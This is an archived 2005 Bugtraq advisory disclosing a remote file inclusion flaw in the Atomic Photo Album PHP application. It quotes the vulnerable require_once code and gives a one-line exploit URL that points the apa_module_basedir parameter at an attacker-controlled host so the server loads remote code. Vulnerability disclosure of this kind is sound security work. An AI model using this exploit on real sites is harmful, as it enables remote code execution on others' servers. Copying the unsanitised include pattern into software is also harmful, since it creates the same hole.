lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20050723211109.3388.qmail@securityfocus.com> Date: 23 Jul 2005 21:11:09 -0000 From: gr0up.pclabs@...il.com To: bugtraq@...urityfocus.com Subject: Atomic Photo Album (APA) apa_phpinclude.inc.php remote file include Atomic Photo Album (APA) apa_phpinclude.inc.php remote file include :> ------------------------------------------------------------ Name: Atomic Photo Album (APA) Version: all Homepage: http://atomicpa.sourceforge.net/ Author: pc_labs / lwdz - RandomHero Date: 20 July 2005 ------------------------------------------------------------ ------------------------------------------------------------ Vulnerable code in : apa_phpinclude.inc.php require_once("apa_authadm.inc.php"); else require_once("apa_auth.inc.php"); ....else{ require_once("$apa_module_basedir/apa_config.inc.php"); ... } ?> ------------------------------------------------------------ Exploit: http://[victim]/[dir]/apa_phpinclude.inc.php?apa_module_basedir=http://[h4x0r_b0x]/ -------------------------------------------------------- Fix and Vendor status: Vendor has been notified. ------------------------------------------------------------ Contact: Irc: irc.cl#pc_labs Author: pc_labs Location: Chile Email: gr0up.pclabs@...il.com Greetz: AgReSsOr http://www.tbc-labz.net